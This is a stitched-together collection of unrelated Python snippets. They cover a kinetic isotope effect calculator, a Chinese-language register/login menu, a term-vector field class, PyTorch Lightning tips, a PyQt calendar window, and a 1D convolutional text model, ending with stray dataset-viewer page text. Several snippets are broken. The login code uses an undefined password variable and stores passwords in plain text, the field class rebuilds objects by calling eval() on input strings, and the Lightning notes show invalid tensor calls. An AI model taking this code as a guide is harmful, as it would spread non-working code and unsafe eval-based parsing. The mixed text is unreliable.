parser.add_argument('-norm_label', action='store_true', help='Whether to normalize labels to be within [0,1]')
parser.add_argument('-fix_inputs', action='store_true', help='Whether to keep input distribution the same and avoid standardization')
parser.add_argument('-scale', type=int, default=1, help='how much to scale the gap between consecutive positions')
args = parser.parse_args()
train(args)
|
#importation
import Bigeleisen_KIE as kie
import pandas as pd
#path of Excel you have fill with your data
df = pd.read_excel('../OneDrive/Bureau/KIE_Vibration.xlsx')
#Data
lini=df['frequencies of the molecule containing the light isotope at the initial state'].to_list()
hini=df['frequencies of the molecule containing the heavy isotope at the initial state'].to_list()
lTrans=df['frequencies of the molecule containing the light isotope at the transition state'].to_list()
htrans=df['frequencies of the molecule containing the heavy isotope at the transition state'].to_list()
#we ask the temperature
T=float(input("Temperature in Kelvin : "))
#we calculate Kie with bigeleisen equation
kie.KIE(lini,hini,lTrans,htrans,T)
|
import getpass
adict = {}
def new_user():
user = input('用户名: ').strip()
if user:
if user not in adict:
# passwd = input('密码: ').strip()
getpass.getpass
if passwd:
adict[user] = passwd
print('注册成功')
else:
print('\033[31;1m密码输入为空,请重新输入.\033[0m')
else:
print('\033[31;1m用户已注册,请重新输入.\033[0m')
else:
print('输入为空,请重新输入.')
def old_user():
user = input('用户名: ').strip()
if user:
passwd = input('密码: ').strip()
if user in adict:
if adict[user] == passwd:
print('\033[31;1m登录成功\033[0m')
else:
print('登陆失败')
else:
print('登陆失败')
print(1)
else:
print('输入为空,请重新输入.')
def show_menu():
prompt = """(0): 注册
(1): 登录
(2): 退出
请选择(0/1/2): """
cmds = {'0': new_user, '1': old_user}
while 1:
choice = input(prompt).strip()
if choice not in ['0', '1', '2']:
print('\033[31;1m无效的参数,请重试.\033[0m')
continue
if choice == '2':
print('\033[31;1mbye-bye\033[0m')
break
cmds[choice]()
if __name__ == '__main__':
show_menu()
|
"""
A representation of one field.
Created on Aug 2013
@author: zul110
"""
class TvField(object):
def __init__(self, name, termVector):
self._name = name # a string
self._termVector = termVector # a dictionary.
def to_dict(self):
return {'name': self._name, 'termVector': self._termVector}
def to_string(self):
tdict = self.to_dict()
return str(tdict)
@classmethod
def from_string(cls, txtString):
tvrecobj = None
try:
dictobj = eval(txtString)
name = dictobj['name']
termVector = dictobj['termVector']
tvrecobj = TvField(name, termVector)
except:
pass
return tvrecobj
def get_name(self):
return self._name
def get_term_vector(self):
return self._termVector
def get_terms_as_str(self):
"""only use every term once
"""
strlist = []
for name, cnt in self._termVector.items():
cnt = 1
# cnt = int(cnt)
for i in range(cnt):
try:
strlist.append(name.decode())
except UnicodeEncodeError:
strlist.append(unicode(name))
except Exception, e:
raise e
return u" ".join(strlist)
def unitTest():
from match_engine.datamodel.field_type import TextField, KeywordsField, IdField
textField = TextField()
tf31 = textField.toTvRecField('title', 'pig is a pig language to start processing steps')
print tf31.get_terms_as_str()
keywordField = KeywordsField()
tf32 = keywordField.toTvRecField('genre', 'music,arts,arts')
print tf32.get_terms_as_str()
idField = IdField()
tf32 = idField.toTvRecField('id', 'abcde123')
print tf32.get_terms_as_str()
if __name__ == "__main__":
unitTest()
|
import torch
import pytorch_lightning as pl
# A LightningModule ORGANIZES the PyTorch code into the following modules:
# 1. Computations (init)
# 2. Training loop (training_step)
# 3. Validation loop (validation_step)
# 4. Test loop (test_step)
# 5. Optimizers (configure_optimizers)
##############################################################################
model = FlashModel()
trainer = Trainer()
trainer.fit(model)
### NO .cuda() or .to() calls in PL #######################################
# DO NOT do this with PL
x = torch.Tensor(2, 3)
x = x.cuda()
x.to(device)
# INSTEAD DO THIS
x = x # leave it alone!
# or to init a new tensor fo this ->
new_x = torch.tensor(2, 3)
new_x = new_x.as_type(x)
# NO SAMPLERS for distributed
# DON'T DO THIS
data = MNIST(...)
sampler = DistributedSampler(data)
DataLoader(data, sampler=sampler)
# DO THIS
data = MNIST(...)
DataLoader(data)
# A LightningModule is a torch.nn.Module with added functionality. Use it as such
model = FlashModel.load_from_checkpoint(PATH)
model.freeze()
out = model(x)
###########################################################################################
|
from PyQt5.QtWidgets import QDialog, QApplication, QVBoxLayout, QCalendarWidget, QLabel
import sys
from PyQt5 import QtGui
class Window(QDialog):
def __init__(self):
super().__init__()
self.title = "This is first thing"
self.height = 700
self.width = 1100
self.top = 100
self.left = 200
self.iconName = "plioky.ico"
self.calendar_var = QCalendarWidget()
self.label = QLabel()
self.init_window()
self.calendar()
def init_window(self):
self.setWindowIcon(QtGui.QIcon(self.iconName))
self.setWindowTitle(self.title)
self.setGeometry(self.left, self.top, self.width, self.height)
self.show()
def calendar(self):
vbox = QVBoxLayout()
self.calendar_var.setGridVisible(True)
self.calendar_var.selectionChanged.connect(self.on_selection_changed)
self.label.setFont(QtGui.QFont("Sanserif", 15))
self.label.setStyleSheet("color:blue")
vbox.addWidget(self.calendar_var)
vbox.addWidget(self.label)
self.setLayout(vbox)
def on_selection_changed(self):
ca = self.calendar_var.selectedDate()
self.label.setText(str(ca))
if __name__ == "__main__":
myapp = QApplication(sys.argv)
window = Window()
sys.exit(myapp.exec()) |
from torch.autograd import Variable
import torch
import torch.utils.data
import torch.tensor
import torch.nn as nn
import torch.nn.functional as nn_func
import torch.optim as optim
import numpy as np
import math
class ConvNet (nn.Module):
output_vector_size = 60
def __init__(self,wordvector_size_input):
#hyperparameters
input_channels = wordvector_size_input
n_grams = 3 # must be odd number
self.hidden_channel_conv1 = 25
self.hidden_channel_conv2 = 25
self.hidden_channel_conv3 = 25
self.hidden_layer_fc1 = 30
self.number_of_classes = 1
self.output_vector_size = ConvNet.output_vector_size
#making hyperparameters more understandable in this function
hidden_channel_conv1 = self.hidden_channel_conv1
hidden_channel_conv2 = self.hidden_channel_conv2
hidden_channel_conv3 = self.hidden_channel_conv3
hidden_layer_fc1 = self.hidden_layer_fc1
number_of_classes = self.number_of_classes
# network structure
super(ConvNet,self).__init__()
self.conv1 = nn.Conv1d(input_channels,hidden_channel_conv1,n_grams,padding=((n_grams-1)//2 ))
self.batch1 = nn.BatchNorm1d(hidden_channel_conv1)
self.conv2 = nn.Conv1d(hidden_channel_conv1,hidden_channel_conv2,n_grams,padding=((n_grams-1)//2))
self.batch2 = nn.BatchNorm1d(hidden_channel_conv2)
self.conv3 = nn.Conv1d(hidden_channel_conv2,hidden_channel_conv3,n_grams,padding=((n_grams-1)//2))
self.batch3 = nn.BatchNorm1d(hidden_channel_conv3)
self.fc1 = nn.Linear(hidden_channel_conv3 , hidden_layer_fc1)
self.fc2 = nn.Linear(hidden_layer_fc1, number_of_classes)
def forward(self,flow):
#process through convolutional layers
flow = flow.transpose(1,2) # nbatches * height * nchannels -> nbatches * nchannels * height
mini_batch_size_here = flow.data.shape[0]
number_of_words_here = flow.data.shape[2]
flow = nn_func.relu(self.batch1(self.conv1(flow)))
flow = nn_func.relu(self.batch2(self.conv2(flow)))
flow = nn_func.relu(self.batch3(self.conv3(flow)))
#reshape to [(minibatchsize * words) , -1] and process through fully connected layers
flow = flow.transpose(1, 2).contiguous().view(-1, self.hidden_channel_conv3) # Does contiguous preserve graph relations between variables?
flow = nn_func.relu(self.fc1(flow))
flow = self.fc2(flow)
# reshape to [minibatchsize , -1] and make it to [minibatchsize , output_vector_size]
flow = flow.view(mini_batch_size_here,number_of_words_here)
variable_to_fixed_length_matrix = Variable(self.variable_to_fixed_length_matrix(number_of_words_here,self.output_vector_size))
flow = torch.mm(flow ,variable_to_fixed_length_matrix)
flow = flow * (self.output_vector_size/number_of_words_here)
return flow
def num_flat_features(self, x):
size = x.size()[1:] # all dimensions except the batch dimension
num_features = 1
for s in size:
num_features *= s
return num_features
def variable_to_fixed_length_matrix(self,row,column):
output_np = np.zeros((row,column))
for i in range(column):
index = (i+1) * row/(column )
index_floor = math.floor(index)
for j in range(0,index_floor):
output_np[j][i] = 1
if (index != index_floor):
output_np[index_floor][i] = index - index_floor
for k in range(row):
index = 0
flag = True
for l in range(column):
if ((output_np[k][l] > 0) and flag):
index = l
flag = False
if(output_np[k][index] == 1) :
for l in range(index+1,column):
output_np[k][l] = 0
elif(output_np[k][index] < 1):
if(index+1 < column):
output_np[k][index+1] = 1- output_np[k][index]
if(index+2 < column):
for l in range (index+2, column):
output_np[k][l] = 0
return torch.from_numpy(output_np).float()
''' Useless for now
class cnn_model :
def __init__(self,wordvector_size_input):
self.net = ConvNet(wordvector_size_input) #wordvector size 100
self.word_vector_size =wordvector_size_input
def train_net(self,formattedReviewList_input):
self.criterion = nn.L1Loss() #ifnotdefined
learning_rate = 0.001
momentum_opt = 0.9
self.optimizer = optim.SGD(self.net.parameters(), lr=learning_rate, momentum=momentum_opt) #ifnotdefined
number_of_loops_over_dataset = 2
n_samples_per_mini_batch = 5
print_per_n_minibatches = 10
shuffle_training_dataset = False
wordvector_size = self.word_vector_size
max_words_for_string = self.max_words_for_string
#making dataset, mini-batch
for i, formattedReview in enumerate(formattedReviewList_input,0):
#zero padding
context_zeropadded = np.zeros([max_words_for_string, wordvector_size])
if (formattedReview.context.shape[0] > 0):
context_zeropadded[:formattedReview.context.shape[0],
:formattedReview.context.shape[1]] = formattedReview.context
# nSamples * nChannels * words form, make a tensor of it
input = torch.unsqueeze(torch.transpose(torch.from_numpy(context_zeropadded).float(), 0, 1), 0)
label = torch.FloatTensor([int(formattedReview.label)])
if(i != 0):
dataset_tensor = torch.cat((dataset_tensor,input), 0)
targetset_tensor = torch.cat((targetset_tensor,label),0)
else:
dataset_tensor = input
targetset_tensor = label
print(dataset_tensor.shape)
print(targetset_tensor.shape)
dataset = torch.utils.data.TensorDataset(dataset_tensor,targetset_tensor)
trainloader = torch.utils.data.DataLoader(dataset, batch_size = n_samples_per_mini_batch,shuffle = shuffle_training_dataset, num_workers = 1,drop_last= True)
for epoch in range(number_of_loops_over_dataset): # loop over the dataset multiple times
running_loss = 0.0
for i, train_data in enumerate(trainloader, 0):
# get the inputs
context_zeropadded = np.zeros([max_words_for_string, wordvector_size])
if (formattedReview.context.shape[0] > 0):
context_zeropadded[:formattedReview.context.shape[0],
:formattedReview.context.shape[1]] = formattedReview.context
input = torch.unsqueeze(torch.transpose(torch.from_numpy(context_zeropadded).float(), 0, 1), 0)
label = torch.FloatTensor([int(formattedReview.label)])
#get the inputs
input, label = train_data
# wrap them in Variable
inputs, labels = Variable(input), Variable(label)
# zero the parameter gradients
self.optimizer.zero_grad()
# forward + backward + optimize
outputs = self.net(inputs)
loss = self.criterion(outputs, labels)
loss.backward()
self.optimizer.step()
# print statistics
running_loss += loss.data[0]
if i % print_per_n_minibatches == (print_per_n_minibatches-1): # print every n mini-batches
print('[%d, %5d] loss: %.3f' %
(epoch + 1, i + 1, running_loss / print_per_n_minibatches))
running_loss = 0.0
print('Finished Training')
def infer(self, minibatch_variable_input):
minibatch_size = 20
minibatch_tensor_list = self.mini_batch_from_formattedReview(minibatch_size,formattedReviewList_input)
output_list = []
for i, minibatch_tensor in enumerate(minibatch_tensor_list,0):
output = self.net(Variable(minibatch_tensor))
output_numpy_array = output.data.numpy().reshape((minibatch_size))
output_list.append(output_numpy_array)
print(output_list)
output = self.net(minibatch_variable_input)
#print(output)
return output
#return output_list
def mini_batch_from_formattedReview(self,mini_batch_size, formattedReviewList_input):
mini_batch_list = []
wordvector_size = self.word_vector_size
max_words_for_string = self.max_words_for_string
for i,formattedReview in enumerate(formattedReviewList_input,0):
#zero padding
context_zeropadded = np.zeros([max_words_for_string, wordvector_size])
if(formattedReview.context.shape[0] > 0):
context_zeropadded[:formattedReview.context.shape[0],:formattedReview.context.shape[1]] = formattedReview.context
input = torch.unsqueeze(torch.transpose(torch.from_numpy(context_zeropadded).float(),0,1),0)
label = torch.FloatTensor(int(formattedReview.label))
#making a minibatch list
if((i % mini_batch_size == mini_batch_size-1) or i >= len(formattedReviewList_input)):
minibatch_tensor = torch.cat((minibatch_tensor, input), 0)
mini_batch_list.append(minibatch_tensor)
elif (i %mini_batch_size != 0):
minibatch_tensor = torch.cat((minibatch_tensor, input), 0)
else:
minibatch_tensor = input
return mini_batch_list
def cnn (formattedReviewList_input, cnn_model_input) :
inference_cnn_numpy_array_list = cnn_model_input.infer(formattedReviewList_input)
return inference_cnn_numpy_array_list
def Create_cnn_model (variable_input):
wordvector_size_arg = variable_input.data.shape()[1]
return cnn_model(wordvector_size_arg)
cnn_1 = ConvNet(100)
number_of_words = 60
print(cnn_1.variable_to_fixed_length_matrix(number_of_words,cnn_1.output_vector_size))
cnn_1.forward(Variable(torch.rand(1,number_of_words,100)))
'''
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.